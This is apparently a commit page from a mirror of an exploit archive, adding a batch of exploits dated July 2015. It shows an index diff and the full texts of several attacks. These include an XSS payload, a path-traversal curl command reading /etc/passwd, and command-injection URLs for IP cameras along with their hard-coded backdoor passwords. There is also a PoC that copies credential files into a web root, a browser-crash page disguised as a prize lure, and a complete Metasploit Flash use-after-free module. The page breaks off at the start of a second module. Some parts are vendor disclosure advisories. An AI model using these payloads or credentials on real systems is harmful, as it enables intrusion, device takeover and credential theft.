bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-07-09

Browse source 
18 new exploits
This commit is contained in:
Offensive Security 2015-07-09 05:03:32 +00:00
parent 8564b18e60
commit 148cfc0504
20 changed files with 1630 additions and 295 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

22
files.csv
View file

@ -29222,7 +29222,7 @@ id,file,description,date,author,platform,type,port
32432,platforms/php/webapps/32432.txt,"Clickbank Portal 'search.php' Cross-Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0
32433,platforms/php/webapps/32433.txt,"Membership Script Multiple Cross-Site Scripting Vulnerabilities",2008-09-27,"Ghost Hacker",php,webapps,0
32434,platforms/php/webapps/32434.txt,"Recipe Script 'search.php' Cross-Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0
32435,platforms/windows/dos/32435.c,"Immunity Debugger 1.85 - Stack Overflow Vulnerabil?ity (PoC)",2014-03-22,"Veysel HATAS",windows,dos,0
32435,platforms/windows/dos/32435.c,"Immunity Debugger 1.85 - Stack Overflow Vulnerability (PoC)",2014-03-22,"Veysel HATAS",windows,dos,0
32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE Vulnerabilities",2014-03-22,"Brandon Perry",php,webapps,0
32438,platforms/windows/remote/32438.rb,"Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012)",2014-03-22,metasploit,windows,remote,0
32439,platforms/php/remote/32439.rb,"Horde Framework Unserialize PHP Code Execution",2014-03-22,metasploit,php,remote,80
@ -32758,7 +32758,7 @@ id,file,description,date,author,platform,type,port
36324,platforms/php/webapps/36324.txt,"WordPress Advanced Text Widget Plugin 2.0 - 'page' Parameter Cross Site Scripting Vulnerability",2011-11-21,Amir,php,webapps,0
36325,platforms/php/webapps/36325.txt,"WordPress Adminimize Plugin 1.7.21 - 'page' Parameter Cross Site Scripting Vulnerability",2011-11-21,Am!r,php,webapps,0
36326,platforms/php/webapps/36326.txt,"WordPress Lanoba Social Plugin 1.0 - 'action' Parameter Cross Site Scripting Vulnerability",2011-11-21,Amir,php,webapps,0
36327,platforms/windows/dos/36327.txt,"Microsoft Windows XP/7 Kernel 'Win32k.sys' Keyboard Layout Local Privilege Escalation Vulnerability",2011-11-22,instruder,windows,dos,0
36327,platforms/windows/local/36327.txt,"Microsoft Windows XP/7 Kernel - 'Win32k.sys' Keyboard Layout Local Privilege Escalation Vulnerability",2011-11-22,instruder,windows,local,0
36328,platforms/php/webapps/36328.txt,"TA.CMS (TeachArabia) index.php id Parameter SQL Injection",2011-11-22,CoBRa_21,php,webapps,0
36329,platforms/php/webapps/36329.txt,"TA.CMS (TeachArabia) lang Parameter Traversal Local File Inclusion",2011-11-22,CoBRa_21,php,webapps,0
36330,platforms/php/webapps/36330.txt,"Dolibarr 3.1 ERP/CRM Multiple Script URI XSS",2011-11-23,"High-Tech Bridge SA",php,webapps,0
@ -33840,6 +33840,8 @@ id,file,description,date,author,platform,type,port
37488,platforms/asp/webapps/37488.txt,"WebsitePanel 'ReturnUrl' Parameter URI Redirection Vulnerability",2012-07-09,"Anastasios Monachos",asp,webapps,0
37489,platforms/php/webapps/37489.txt,"MGB Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-09,"Stefan Schurtz",php,webapps,0
37492,platforms/ios/webapps/37492.txt,"WK UDID v1.0.1 iOS - Command Inject Vulnerability",2015-07-05,Vulnerability-Lab,ios,webapps,0
37534,platforms/php/webapps/37534.txt,"WordPress Easy2Map Plugin 1.24 - SQL Injection",2015-07-08,"Larry W. Cashdollar",php,webapps,80
37535,platforms/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - SEH Buffer Overflow",2015-07-08,Vulnerability-Lab,windows,local,0
37494,platforms/php/webapps/37494.txt,"Wordpress S3Bubble Cloud Video With Adverts & Analytics 0.7 - Arbitrary File Download",2015-07-05,CrashBandicot,php,webapps,0
37500,platforms/php/webapps/37500.txt,"Funeral Script PHP Cross Site Scripting and SQL Injection Vulnerabilities",2012-06-17,snup,php,webapps,0
37501,platforms/php/webapps/37501.rb,"WordPress Generic Plugin Arbitrary File Upload Vulnerability",2012-07-13,KedAns-Dz,php,webapps,0
@ -33859,3 +33861,19 @@ id,file,description,date,author,platform,type,port
37515,platforms/php/webapps/37515.txt,"phpliteadmin 1.1 - Multiple Vulnerabilities",2015-07-07,"John Page",php,webapps,80
37516,platforms/hardware/webapps/37516.txt,"Dlink DSL-2750u and DSL-2730u - Authenticated Local File Disclosure",2015-07-07,"SATHISH ARTHAR",hardware,webapps,0
37517,platforms/hardware/dos/37517.pl,"INFOMARK IMW-C920W miniupnpd 1.0 - Denial of Service",2015-07-07,"Todor Donev",hardware,dos,1900
37518,platforms/multiple/dos/37518.html,"Arora Browser Remote Denial of Service Vulnerability",2012-07-18,t3rm!n4t0r,multiple,dos,0
37519,platforms/php/webapps/37519.txt,"Joomla! 'com_hello' Component 'controller' Parameter Local File Include Vulnerability",2012-07-19,"AJAX Security Team",php,webapps,0
37520,platforms/php/webapps/37520.txt,"Maian Survey 'index.php' URI Redirection and Local File Include Vulnerabilities",2012-07-20,PuN!Sh3r,php,webapps,0
37521,platforms/php/webapps/37521.txt,"CodeIgniter <= 2.1 'xss_clean()' Filter Security Bypass Vulnerability",2012-07-19,"Krzysztof Kotowicz",php,webapps,0
37522,platforms/php/webapps/37522.txt,"WordPress chenpress Plugin Arbitrary File Upload Vulnerability",2012-07-21,Am!r,php,webapps,0
37523,platforms/multiple/remote/37523.rb,"Adobe Flash Player ByteArray Use After Free",2015-07-08,metasploit,multiple,remote,0
37524,platforms/hardware/webapps/37524.txt,"Cradlepoint MBR1400 and MBR1200 Local File Inclusion",2015-07-08,Doc_Hak,hardware,webapps,80
37525,platforms/windows/dos/37525.c,"Symantec Endpoint Protection 12.1.4013 Service Disabling Vulnerability",2015-07-08,"John Page",windows,dos,0
37527,platforms/hardware/webapps/37527.txt,"AirLink101 SkyIPCam1620W OS Command Injection",2015-07-08,"Core Security",hardware,webapps,0
37528,platforms/php/webapps/37528.txt,"Centreon 2.5.4 - Multiple Vulnerabilities",2015-07-08,"Huy-Ngoc DAU",php,webapps,80
37529,platforms/php/webapps/37529.txt,"WordPress MDC YouTube Downloader Plugin 2.1.0 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",php,webapps,80
37530,platforms/php/webapps/37530.txt,"WordPress WP e-Commerce Shop Styling Plugin 2.5 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",php,webapps,80
37531,platforms/hardware/webapps/37531.txt,"Grandstream GXV3275 < 1.0.3.30 - Multiple Vulnerabilities",2015-07-08,"David Jorm",hardware,webapps,0
37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080
37533,platforms/asp/webapps/37533.txt,"Orchard CMS 1.7.3_ 1.8.2_ 1.9.0 - Stored XSS Vulnerability",2015-07-08,"Paris Zoumpouloglou",asp,webapps,80
37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow",2015-07-08,metasploit,multiple,remote,0

Can't render this file because it is too large.

69
platforms/asp/webapps/37533.txt Executable file
View file

@ -0,0 +1,69 @@
-----------------
Background
-----------------
Orchard is a free, open source, community-focused content management
system written in ASP.NET platform using the ASP.NET MVC framework. Its
vision is to create shared components for building ASP.NET applications
and extensions, and specific applications that leverage these components
to meet the needs of end-users, scripters, and developers.
------------------------
Software Version
------------------------
The version of Orchard affected by this issue are 1.7.3, 1.8.2 and
1.9.0. Version below 1.7.3 are not affected
---------------
Description
---------------
A persistent XSS vulnerability was discovered in the Users module that
is distributed with the core distribution of the CMS. The issue
potentially allows elevation of privileges by tricking an administrator
to execute some custom crafted script on his behalf. The issue affects
the Username field, since a user is allowed to register a username
containing potentially dangerous characters.
More information can be found here
http://docs.orchardproject.net/Documentation/Patch-20150630
----------------------
Proof of Concept
----------------------
1. Attacker registers a new user account with username e.x
<script>alert("XSS")</script>
2. The administrator attempts to delete the account using the Users core
module.
3. Once the administrator clicks on the "delete" action, the XSS payload
is executed.
-------------
Mitigation
-------------
See http://docs.orchardproject.net/Documentation/Patch-20150630
-----------
Timeline
-----------
2015-06-10 Vulnerability reported to Orchard CMS development team
2015-06-12 Response and issue verification
2015-06-30 Update and patch release
2015-07-06 Public Disclosure
---------
Credits
---------
Reported by Paris Zoumpouloglou of Project Zero labs
(https://projectzero.gr)
--
Paris Zoumpouloglou
@pzmini0n
https://projectzero.gr

17
platforms/hardware/webapps/37524.txt Executable file
View file

@ -0,0 +1,17 @@
# Exploit Title: Cradlepoint MBR LFI
# Date: 7/7/2015
# Exploit Author: Doc_Hak
# Vendor Homepage: https://cradlepoint.com/
# Version: 1200/1400 (REQUIRED)
# Tested on: Embedded linux
I found a local file include with root level permissions on
cradlepoint routers. So far looks like it works on MBR1400 and MBR1200
routers, though others could be affected. I say it is with root level
because it can read /etc/passwd and there is no "x" indicating the hash is
stored in the /etc/shadow file. Therefore the root hash is included in
this file.
To access the root hash on Cradlepoint MBRs simply:
curl http://192.168.1.1/../../../../../../../../../../../../etc/passwd

152
platforms/hardware/webapps/37527.txt Executable file
View file

@ -0,0 +1,152 @@
1. Advisory Information
Title: AirLink101 SkyIPCam1620W OS Command Injection
Advisory ID: CORE-2015-0011
Advisory URL: http://www.coresecurity.com/advisories/airlink101-skyipcam1620w-os-command-injection
Date published: 2015-07-08
Date of last update: 2015-07-08
Vendors contacted: AirLink101
Release mode: User release
2. Vulnerability Information
Class: OS Command Injection [CWE-78], Use of Hard-coded Credentials" [CWE-798]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-2280
3. Vulnerability Description
AirLink101 [2] SkyIPCam1620W Wireless N MPEG4 3GPP Network Camera streams supreme quality MPEG4 and MJPEG image. It supports remote surveillance on computers over the Internet or on mobile handheld devices.
The SkyIPCam1620W Wireless N MPEG4 3GPP Network Camera [1] is vulnerable to an OS Command Injection Vulnerability in the snwrite.cgi binary.
4. Vulnerable Packages
AirLink101 SkyIPCam1620W Wireless N MPEG4 3GPP Network Camera with firmware FW_AIC1620W_1.1.0-12_20120709_r1192.pck (Aug. 2012)
Other devices based on the same firmware are probably affected too, but they were not tested.
5. Vendor Information, Solutions and Workarounds
Core Security recommends applying a WAF (Web Application Firewall) rule that would filter the vulnerable request (either the CGI file or the parameters where the injection is performed) in order to avoid exploitation.
Contact the vendor for further information.
6. Credits
This vulnerability was discovered and researched by Nahuel Riva from the Core Security Exploit Writing Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from the Core Security Advisories Team.
7. Technical Description / Proof of Concept Code
7.1. OS Command Injection in CGI binary file
[CVE-2015-2280] The snwrite.cgi binary has an OS Command Injection at function loc_8928 when handling the "mac" parameter:
.text:00008928
.text:00008928 loc_8928
.text:00008928 BL memset
.text:0000892C LDR R3, [R7,#0x40]
.text:00008930 LDR R2, =stderr
.text:00008934 ADD R3, R5, R3
.text:00008938 LDR R0, [R2] ; stream
.text:0000893C LDR R1, =aMacS ; "mac = %s"
.text:00008940 LDR R2, [R3,#0x104]
.text:00008944 BL fprintf
.text:00008948 LDR R2, [R7,#0x40]
.text:0000894C ADD R2, R5, R2
.text:00008950 LDR R3, [R2,#0x104]
.text:00008954 MOV R1, #0x80 ; maxlen
.text:00008958 LDR R2, =aEtcInit_dMacwr ; "/etc/init.d/macwrite.sh %s 1>/dev/null "...
.text:0000895C MOV R0, R8 ; s
.text:00008960 BL snprintf
.text:00008964 MOV R0, R8 ; command
.text:00008968 BL system
.text:0000896C LDR R4, [R7,#0x40]
.text:00008970 B loc_8908
.text:00008970 ; End of function sub_88A8
.text:00008970
The "mac" parameter is used in a printf() call to build a command to execute the macwrite.sh shell script to update the MAC Address configuration. The printf() built string is then used in a system() call. Therefore, it is possible to inject arbitrary commands just by putting a ";" after the "mac" parameter, for example:
http://<Camera_IP>/maker/snwrite.cgi?mac=1234;ps
In order to invoke the snwrite.cgi binary valid credentials are required, but a backdoor account located in /server/usr.ini can be used:
nriva@fastix:/mnt/firmware/server$ cat usr.ini
admin=Basic YWRtaW46YWRtaW4=
maker=Basic cHJvZHVjdG1ha2VyOmZ0dnNiYW5uZWRjb2Rl
These accounts are encoded in base64 so it is relatively easy to recover them:
>>> "YWRtaW46YWRtaW4=".decode("base64")
'admin:admin'
>>> "cHJvZHVjdG1ha2VyOmZ0dnNiYW5uZWRjb2Rl".decode("base64")
'productmaker:ftvsbannedcode'
Using the 'productmaker:ftvsbannedcode' backdoor account allows access to the path /maker/snwrite.cgi and therefore the ability to perform the injection explained above.
8. Report Timeline
2015-05-04: Core Security sent an initial email notification to AirLink101. Publication date set to June 8, 2015.
2015-05-07: Core Security sent another email notification to AirLink101.
2015-05-14: Core Security attempted to contact AirLink101 through Twitter.
2015-05-14: Core Security sent yet another email notification to AirLink101.
2015-05-14: AirLink101 replied with a direct Twitter message asking Core to resend the email.
2015-05-14: Core Security informed AirLink101 through Twitter that they resent the email.
2015-05-15: Core Security asked AirLink101 through Twitter if they were able to find the email they sent.
2015-05-18: Core Security again asked AirLink101 through Twitter if they received the email.
2015-05-19: AirLink101 replied to Core on Twitter saying that they received the email and were reviewing the situation.
2015-05-20: Core Security replied AirLink101 with a direct Twitter message stating that they needed their reply soon in order to coordinate the advisory publication.
2015-05-21: AirLink101 wrote an email requesting that Core share the model and the issue they found, and requesting a contact phone number.
2015-05-22: Core Security replied to AirLink101 by email and asked if they had a PGP key or if they preferred the report to be sent in plain text. Additionally, Core informed AirLink101 that it is their policy to communicate exclusively via email in order to keep a record.
2015-05-22: AirLink101 replied by email and asked when the advisory would be published without answering the previous question (PGP or plain text) and asked again for a contact phone number.
2015-05-26: Core Security replied to AirLink101 by email clarifying that they previously requested their input on whether they would prefer to receive the information encrypted or in plain text, and explained again that it is their policy to communicate using email.
2015-05-28: Core Security asked AirLink101 by email if they received their previous message.
2015-06-04: Core Security again asked AirLink101 if they were receiving their emails. They informed Airlink101 that if they didn't receive an answer soon they would be forced to publish their findings as a user release.
2015-06-16: Core Security informed AirLink101 that if they didn't receive an answer that week they would be forced to publish their findings.
2015-06-18: Core Security informed AirLink101 that it was their last chance to answer their emails, if not the advisory was going to be published on June 23, 2015.
2015-07-08: Advisory CORE-2015-0011 published.
9. References
[1] http://airlink101.com/products/aic1620w.php.
[2] http://www.airlink101.com/.
10. About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
11. About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
12. Disclaimer
The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

49
platforms/hardware/webapps/37531.txt Executable file
View file

@ -0,0 +1,49 @@
The Grandstream GXV3275 is an Android-based VoIP phone. Several
vulnerabilities were found affecting this device.
* The device ships with a default root SSH key, which could be used as a
backdoor:
/system/root/.ssh # cat authorized_keys
Public key portion is:
ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAAAgwCIcYbgmdHTpTeDcBA4IOg5Z7d2By0GXGihZzcTxZC+YTWGUe/HJc+pYDpDrGMWg0hMqd+JPs1GaLNw4pw0Mip6VMT7VjoZ8Z+n2ULNyK1IoTU4C3Ea4vcYVR8804Pvh9vXxC0iuMEr1Jx7SewUwSlABX04uVpEObgnUhpi+hn/H34/
jhzhao@jhzhao-Lenovo
Fingerprint: md5 7b:6e:a0:00:19:54:a6:39:84:1f:f9:18:2e:79:61:b5
This issue has not been resolved.
* The SSH interface only provides access to a limited CLI. The CLI's ping
and traceroute commands will pass user input as parameters to underlying
system commands without escaping shell metacharacters. This can be
exploited to break out to a shell:
GXV3275 > traceroute $(sh)
This shell will only see stderr, so we then need to run sh with stdout
redirected to stderr:
sh 1>&2
This issue has been resolved in firmware version 1.0.3.30.
* The web interface exposes an undocumented command execution API:
http://DEVICEIP/manager?action=execcmd&command=echo%20%22hello%22%20%3E%20/system/root/test.txt
This issue has been resolved in firmware version 1.0.3.30.
* The web interface allows unprivileged users to escalate privileges by
modifying a cookie on the client side:
javascript:void(document.cookie="type=admin")
Full details are available here:
http://davidjorm.blogspot.com/2015/07/101-ways-to-pwn-phone.html
MITRE was contacted repeatedly requesting CVE names for these issues, but
never replied.
David

225
platforms/hardware/webapps/37532.txt Executable file
View file

@ -0,0 +1,225 @@
1. Advisory Information
Title: AirLive Multiple Products OS Command Injection
Advisory ID: CORE-2015-0012
Advisory URL: http://www.coresecurity.com/advisories/airlive-multiple-products-os-command-injection
Date published: 2015-07-06
Date of last update: 2015-07-06
Vendors contacted: AirLive
Release mode: User release
2. Vulnerability Information
Class: OS Command Injection [CWE-78], OS Command Injection [CWE-78]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-2279, CVE-2014-8389
3. Vulnerability Description
AirLive MD-3025 [3], BU-3026 [4], BU-2015 [2], WL-2000CAM [5] and POE-200CAM [6] are IP cameras designed for professional surveillance and security applications. The built-in IR LEDs provide high quality nighttime monitoring.
These AirLive [1] devices are vulnerable to an OS Command Injection Vulnerability. In the case of the MD-3025, BU-3026 and BU-2015 cameras, the vulnerability lies in the cgi_test.cgi binary file. In the case of the WL-2000CAM and POE-200CAM cameras, the command injection can be performed using the vulnerable wireless_mft.cgi binary file.
4. Vulnerable Packages
AirLive BU-2015 with firmware 1.03.18 16.06.2014
AirLive BU-3026 with firmware 1.43 21.08.2014
AirLive MD-3025 with firmware 1.81 21.08.2014
AirLive WL-2000CAM with firmware LM.1.6.18 14.10.2011
AirLive POE-200CAM v2 with firmware LM.1.6.17.01
Other devices may be affected too, but they were not checked.
5. Vendor Information, Solutions and Workarounds
Core Security recommends to apply a WAF (Web Application Firewall) rule that would filter the vulnerable request (either the CGI file or the parameters where the injection is performed) in order to avoid exploitation.
Contact the vendor for further information.
6. Credits
These vulnerabilities were discovered and researched by Nahuel Riva from Core Security Exploit Writing Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Security Advisories Team.
7. Technical Description / Proof of Concept Code
7.1. OS Command Injection in cgi_test.cgi when handling certain parameters
[CVE-2015-2279] There is an OS Command Injection in the cgi_test.cgi binary file in the AirLive MD-3025, BU-3026 and BU-2015 cameras when handling certain parameters. That specific CGI file can be requested without authentication, unless the user specified in the configuration of the camera that every communication should be performed over HTTPS (not enabled by default).
The vulnerable parameters are the following:
write_mac
write_pid
write_msn
write_tan
write_hdv
These parameters are used to invoke another binary file called "info_writer".
In the sub_93F4 function it uses the "QUERY_STRING" and checks if it contains any of the parameters followed by an ampersand symbol:
sub_93F4
STMFD SP!, {R4-R7,LR}
LDR R0, =aQuery_string ; "QUERY_STRING"
SUB SP, SP, #4
BL getenv
MOV R1, #0 ; c
MOV R2, #0x12 ; n
MOV R6, R0
LDR R0, =unk_14B70 ; s
BL memset
LDR R0, =aContentTypeTex ; "Content-type: text/html\n\n<body>"
BL printf
MOV R5, #0
LDR R7, =off_B7D0
MOV R4, R5
B loc_943C
[...]
loc_9540 ; jumptable 00009470 case 7
MOV R0, R6
LDR R1, =aWrite_pid ; "write_pid&"
BL strstr
CMP R0, #0
BEQ loc_94CC ; jumptable 00009470 default case
[...]
It then uses whatever appears after the ampersand symbol in a call to printf() in order to put together the parameter with which the "info_writer" binary will be invoked. Finally, it calls the system() function:
[...]
.text:00009730 loc_9730 ; CODE XREF: .text:00009714j
.text:00009730 MOV R2, R5
.text:00009734 LDR R1, =aOptIpncInfo__1 ; "/opt/ipnc/info_writer -p %s > /dev/null"
.text:00009738 MOV R0, SP
.text:0000973C BL sprintf
.text:00009740 MOV R0, SP
.text:00009744 BL system
.text:00009748 MOV R2, R5
.text:0000974C LDR R1, =aWrite_pidOkPid ; "WRITE_PID OK, PID=%s\r\n"
.text:00009750 LDR R0, =unk_1977C
.text:00009754 MOV R4, SP
.text:00009758 BL sprintf
.text:0000975C B loc_9728
[...]
Consequently, if a semicolon (;) is used after the ampersand symbol, arbitrary commands can be injected into the operating system.
It's important to take into account that depending on the parameter used, there are checks like this (corresponding to the write_pid parameter):
.text:00009708 MOV R0, R5
.text:0000970C BL strlen
.text:00009710 CMP R0, #9
This verifies that the parameter has a specific length. Because of this, the injection is somewhat limited. Nevertheless, there are possible commands that can be executed, for example:
Proof of Concept:
http://<Camera-IP>:8080/cgi_test.cgi?write_tan&;ls&ls%20-la
PoC Output:
Write MAC address, model name, hw version, sn, tan, pid,firmware version
-c => set system MAC address
-m [MAC] => write MAC address
-n [Model Name] => write Model Name
-h [HW Version] => write HW Version
-v [Firmware Version] => write Firmware Version
-s [SN] => write SN
-t [TAN] => write TAN
-d [PID] => write PID
-r [CR] => write Country Region
-p => show current info.
Content-type: text/html
<body>WRITE_TAN OK, PID=;ls&ls%20-
</body></html>3g.htm
485.htm
SStreamVideo.cab
ado.htm
cfgupgrade.cgi
cgi_test.cgi
client.htm
default.htm
default_else.htm
default_ie.htm
default_m.htm
default_nets.htm
[...]
7.2. OS Command Injection in AirLive WL-2000CAM's wireless_mft.cgi binary file
[CVE-2014-8389] The AirLive WL-2000CAM anf POE-200CAM "/cgi-bin/mft/wireless_mft.cgi" binary file, has an OS command injection in the parameter ap that can be exploited using the hard-coded credentials the embedded Boa web server has inside its configuration file:
username: manufacture
password: erutcafunam
The following proof of concept copies the file where the user credentials are stored in the web server root directory:
<a href="http://<Camera-IP>/cgi-bin/mft/wireless_mft?ap=testname;cp%20/var/www/secret.passwd%20/web/html/credentials">http://<Camera-IP>/cgi-bin/mft/wireless_mft?ap=testname;cp%20/var/www/...</a>
Afterwards, the user credentials can be obtained by requesting:
<a href="http://<Camera-IP>/credentials">http://<Camera-IP>/credentials</a>
The credentials are encoded in a string using Base64, therefore it is easy to decode them and have complete access to the device.
8. Report Timeline
2015-05-04: Core Security sent an initial email notification to AirLive. Publication date set to Jun 8, 2015.
2015-05-07: Core Security sent another email notification to AirLive.
2015-05-14: Core Security attempted to contact AirLive through Twitter.
2015-05-20: Core Security attempted to contact AirLive through Twitter again.
2015-06-16: Core Security sent another email and Twitter notification to AirLive.
2015-06-18: Core Security sent an email to Airlive explaining that this was their last opportunity to reply, if not the advisory was going to be published on June 23, 2015.
2015-07-06: Advisory CORE-2015-0012 published.
9. References
[1] http://www.airlive.com.
[2] http://www.airlive.com/product/BU-2015.
[3] http://www.airlive.com/product/MD-3025.
[4] http://www.airlive.com/product/BU-3026.
[5] http://www.airlivecam.eu/manualy/ip_kamery/WL-2000CAM.pdf.
[6] http://www.airlivesecurity.com/product.php?id=5#.
10. About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
11. About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
12. Disclaimer
The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

29
platforms/multiple/dos/37518.html Executable file
View file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/54599/info
Arora Browser is prone to a remote denial-of-service vulnerability.
Attackers can exploit these issues to crash an application, which causes a denial-of-service condition.
<html>
<head>
<title>Arora Browser Remote Denial of Service </title>
<body bgcolor="Grey">
<script type="text/javascript">
function loxians() {
var buffer = "";
for (var i = 0; i < 8000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 8000; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script>
</head>
<body>
<center>
<br><h2><a href="javascript:loxians();">YOU HAVE WON 100,000$ ! CLICK HERE!!</a></font></h2>
</body>
</html>

150
platforms/multiple/remote/37523.rb Executable file
View file

@ -0,0 +1,150 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player ByteArray Use After Free',
'Description' => %q{
This module exploits an use after free on Adobe Flash Player. The vulnerability,
discovered by Hacking Team and made public on its July 2015 data leak, was
described as an Use After Free while handling ByteArray objects. This module has
been tested successfully on:
Windows XP, Chrome 43 and Adobe Flash 18.0.0.194,
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194,
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Someone from HackingTeam
'juan vazquez' # msf module
],
'References' =>
[
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'],
['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win', 'linux'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX ||
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81 ||
os =~ OperatingSystems::Match::WINDOWS_VISTA ||
os =~ OperatingSystems::Match::WINDOWS_XP
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF || ua == Msf::HttpClients::CHROME
when 'Linux'
return true if ua == Msf::HttpClients::FF
end
false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
# Note: Chrome might be vague about the version.
# Instead of 18.0.0.203, it just says 18.0
return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')
when 'Linux'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468')
end
false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jul 06 2015',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]
if target.name =~ /Windows/
platform_id = 'win'
elsif target.name =~ /Linux/
platform_id = 'linux'
end
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'hacking_team', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end

193
platforms/multiple/remote/37536.rb Executable file
View file

@ -0,0 +1,193 @@
##
# This module requires Metasploit: http://metasploit.com/download
